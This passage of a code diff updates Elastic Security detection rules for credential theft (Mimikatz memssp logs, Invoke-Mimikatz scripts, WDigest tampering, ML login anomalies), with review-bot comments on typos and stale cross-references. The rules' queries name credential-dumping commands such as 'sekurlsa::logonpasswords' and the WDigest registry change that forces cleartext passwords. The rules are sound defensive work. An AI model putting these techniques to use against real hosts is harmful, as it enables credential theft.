other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Mimikatz Memssp Log File Detected\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to laterally move and pivot across a network.\n\nThis rule looks for the creation of a file named `mimilsa.log`, which is generated when using the Mimikatz misc::memssp\nmodule, which injects a malicious Windows SSP to collect locally authenticated credentials, which includes the computer\naccount password, running service credentials, and any accounts that logon.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n- Retrieve and inspect the log file contents.\n- Search for DLL files created in the same location as the log file, and retrieve unsigned DLLs.\n - Use the PowerShell Get-FileHash cmdlet to get the SHA-256 hash value of these files.\n - Search for the existence of these files in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Identify the process that created the DLL using file creation events.\n\n### False positive analysis\n\n- This file name `mimilsa.log` should not legitimately be created.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the host is a Domain Controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs to ensure that the least privilege principle is\n being followed and reduce the attack surface.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reboot the host to remove the injected SSP from memory.\n- Reimage the host operating system or restore compromised files to clean versions.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where file.name : \"mimilsa.log\" and process.name : \"lsass.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -43,5 +56,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json index 0942b6fe8da8c..090c676cddc21 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mimikatz_powershell_module.json 
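Review bot: The rewritten `note` still lists the cross-reference `Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46` under `### Related rules`, but the rule edited next in this diff is titled `Potential Invoke-Mimikatz PowerShell Script` (its own note heading reads "Investigating Mimikatz PowerShell Activity"), so the name in this cross-reference appears stale; that rule's `rule_id` is outside this view, so the UUID should be checked against it as well. Since this commit already rewrites the entire `note` string and bumps `version`, updating the entry here to `- Potential Invoke-Mimikatz PowerShell Script - ac96ceb8-4399-4191-af1d-4feeac1f1f46` avoids another churn-only version bump later. The JSON object this hunk belongs to starts and ends outside the hunk.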
@@ -11,14 +11,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Invoke-Mimikatz PowerShell Script", - "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump\ncredentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be\ntreated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the\n \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the\ntarget host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide\nthis capability.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "note": "## Triage and analysis\n\n### Investigating Mimikatz PowerShell Activity\n\n[Mimikatz](https://github.com/gentilkiwi/mimikatz) is an open-source tool used to collect, decrypt, and/or use cached\ncredentials. 
This tool is commonly abused by adversaries during the post-compromise stage where adversaries have gained\nan initial foothold on an endpoint and are looking to elevate privileges and seek out additional authentication objects\nsuch as tokens/hashes/credentials that can then be used to move laterally and pivot across a network.\n\nThis rule looks for PowerShell scripts that load mimikatz in memory, like Invoke-Mimikataz, which are used to dump\ncredentials from the Local Security Authority Subsystem Service (LSASS). Any activity triggered from this rule should be\ntreated with high priority as it typically represents an active adversary.\n\nMore information about Mimikatz components and how to detect/prevent them can be found on [ADSecurity](https://adsecurity.org/?page_id=1821).\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Invoke-Mimitakz and alike scripts heavily use other capabilities covered by other detections described in the\n \"Related Rules\" section.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the\ntarget host.\n - Examine network and security events in the environment to identify potential lateral movement using compromised credentials.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Mimikatz Memssp Log File Detected - ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6\n- Modification of WDigest Security Provider - d703a5af-d5b0-43bd-8ddb-7a5d500b7da5\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Validate that cleartext passwords are disabled in memory for use with `WDigest`.\n- Look into preventing access to `LSASS` using capabilities such as LSA protection or antivirus/EDR tools that provide\nthis capability.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.category:process and\npowershell.file.script_block_text:(\n (DumpCreds and\n DumpCerts) or\n \"sekurlsa::logonpasswords\" or\n (\"crypto::certificates\" and\n \"CERT_SYSTEM_STORE_LOCAL_MACHINE\")\n)\n", "references": [ "https://attack.mitre.org/software/S0002/", "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
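Review bot: The rewritten `note` and the new `setup` string carry over typos that this rewrite could have corrected: `Invoke-Mimikataz` and `Invoke-Mimitakz` should both read `Invoke-Mimikatz`, and `with with Advanced Audit Configuration` has a duplicated word. The added `required_fields` entry records `powershell.file.script_block_text` as `"ecs": false, "type": "unknown"`; if the schema this rule is validated against maps that field, recording its actual type would make the required-field check meaningful, and if the type is intentionally unresolved that is worth stating in the PR description. This hunk names the rule `Potential Invoke-Mimikatz PowerShell Script`, while the `### Related rules` lines of the Memssp and WDigest rules in the same commit still cite it as `Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46`; those lines should use the current name so analysts can find the rule.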
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json index 9c0f2d0c07dc9..7aec30a007bde 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mitm_localhost_webproxy.json @@ -19,6 +19,33 @@ "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "10a500bb-a28f-418e-ba29-ca4c8d1a9f2f", "severity": "medium", @@ -48,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json index 88644687c0419..0df83164ccc81 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_failed_logon_events.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_failed_logon_events.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 2 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json similarity index 67% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json index d591cc6e0f56d..073f679c8c31a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 1 + "version": 2 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json similarity index 69% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json index ee9acc43ac8d7..4ac33f3b579b3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_auth_spike_in_logon_events_from_a_source_ip.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 2 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json similarity index 55% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json index c0bcf411363dd..4008fe3dfbf50 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_process.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json index b1761e9c95d23..e8f30690dc898 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_metadata_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_linux_anomalous_metadata_user.json @@ -22,8 +22,33 @@ "Host", "Linux", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json similarity index 65% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json index 1c3902fc94c0b..6aaafdab1f81c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_suspicious_login_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_suspicious_login_activity.json @@ -22,8 +22,26 @@ "Elastic", "Authentication", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json similarity index 55% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json index d0eb0d70841df..5e3474a5b4b26 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_process.json @@ -22,8 +22,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json index 343719523210f..fb34ca2f29016 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_metadata_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_ml_windows_anomalous_metadata_user.json @@ -22,8 +22,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.005", + "name": "Cloud Instance Metadata API", + "reference": "https://attack.mitre.org/techniques/T1552/005/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json index 6e0dd264229d7..457ad2b940cfc 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_mod_wdigest_security_provider.json 
@@ -12,15 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of WDigest Security Provider", - "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send\ncleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications\nbased on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default,\nwhich is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the\n`HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is\ncommonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should\ntreat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target\nhost after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and\nmonitored by the security team, as these modifications expose the entire domain to credential compromises and\nconsequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type : (\"creation\", \"change\") and\n registry.path : \n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n and registry.data.strings : (\"1\", \"0x00000001\")\n", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send\ncleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications\nbased on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default,\nwhich is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the\n`HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. 
